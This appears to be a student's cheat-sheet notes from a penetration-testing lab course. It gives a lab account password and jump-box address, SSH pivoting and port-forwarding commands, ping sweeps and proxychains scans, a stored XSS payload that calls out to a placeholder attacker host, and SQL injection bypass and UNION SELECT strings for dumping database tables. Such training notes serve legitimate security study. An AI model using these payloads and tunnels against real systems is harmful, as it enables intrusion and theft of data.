Stack Number     Username          Password             Jump Box
12               MALY-006-M        0pRqxfAB3sOlp2Q      10.50.29.236
Bash IP: 10.50.40.70 Win IP: 10.50.25.180, ssh student@10.50.40.70 -X, terminator
### NEW TUNNEL ###
#SET CONNECTION TO JUMP BOX
ssh -MS /tmp/jump student@10.50.29.236
# Ping sweep from jump box
for i in {1..254}; do (ping -c 1 192.168.28.$i | grep "bytes from" &) ; done
192.168.28.97,98,100,105
#From lin-ops Dynamic tunnel
ssh -S /tmp/jump jump -O forward -D 9050 
# Scan found IPs Validate ports
proxychains nmap 192.168.28.97,98,100,105,111
proxychains nc 192.168.28.100 80/2222
# Cancel dynamic Tunnel
ssh -S /tmp/jump jump -O cancel -D 9050 
#Set up Port Forwarding
ssh -S /tmp/jump jump -O forward -L 2222:192.168.28.100:80 -L 3333:192.168.28.100:2222
# SSH Connect new socket to .100
ssh -MS /tmp/t1 creds@127.0.0.1 -p 3333
#Create new connection to enumerated devices
ssh -S /tmp/t1 -O forward -L 6666:192.168.50.10:22 -L 7777:192.168.50.20:22
#SSH Connect new socket to .20
ssh -MS /tmp/t2 creds@127.0.0.1 -p 7777
------------------------------------------------------------------
NMAP Script location /usr/share/nmap/scripts
Banner grab
nmap --script=banner
HTTP Info 
--script=http-enum.nse
--------------------------------------------------------------DAY2--------------------------------
#GET request can be utilized to pass data to the server using the URL string
http://10.50.x.x/path/pathdemo.php?myfile=demo1
#Robots.txt is used to give and take permissions to a web scraper
http://10.50.28.11/robots.txt
#Robots.txt, Then legit surf, then use NSE scripts, Finally use Nikto
#Stored XSS Example 
<img src="http://invalid" onerror="window.open('http://10.50.XX.XX:8000/ram.png','xss','height=1,width=1');">
-------------------------------------------------------------DAY3 SQL------------------------------
### SQL NAVIGATION DEMO ###
#Access SQL database
mysql
#find SQL databases
show database ;
#information_schema contains info about other databases
use information_schema
#Find tables within is
show tables ; 
#Show the coloums witin the coloums table 
show coloums from coloums;
  TABLE_SCHEMA
  TABLE_NAME
  COLUMN_NAME
#Show databases, tables, and colunms                 (database)      (table)
select table_schema,table_name,coloumn_name from information_schema.columns ;
#grab colunms from table userinfo
select username,passwd,sudentID from session.userinfo ;
#grab colunms from table car
select name,cost,color from session.car ;
###-------------------###
#Single quote to check sor SQL injection
#Check for field santitzion LOGIN
'OR 1=' 1
#Using Web Tools view post request Raw, copy the string into the url after the ?
###FOR SQL POST 
#Identify Vulnerable Field by adding 'OR 1='1 to the end of the valid feilds 
#use UNION SELECT to identify number of colunms
Audi 'UNION SELECT 1,2,3,4,5#  
    -4 colunms displayes coloumn 2 is hidden
## GOLDEN STATEMENT
Audi 'UNION SELECT table_schema,table_name,colunm_name from information_schema.columns #
#edit golden statement for hidden columns and total columns 
Audi 'UNION SELECT table_schema,2,table_name,column_name,5 from information_schema.columns #
#edit statement to show contents of columns
Audi 'UNION SELECT type,2,cost,color,year from session.car #
### FOR SQL GET
#After Selection field enter true statement OR 1=1 on all URL options 
#Determine number of displayed fields 
UNION SELECT 1,2,3
#Change golden statement to reflect how feilds are displayed 
UNION SELECT table_schema,column_name,table_name from information_schema.columns
#                 (1)         (3)         (2) 
#continue on using same stratagy as POST 
UNION SELECT cost,color,year from session.car
#@@version as a selection shows the version of the SQL server
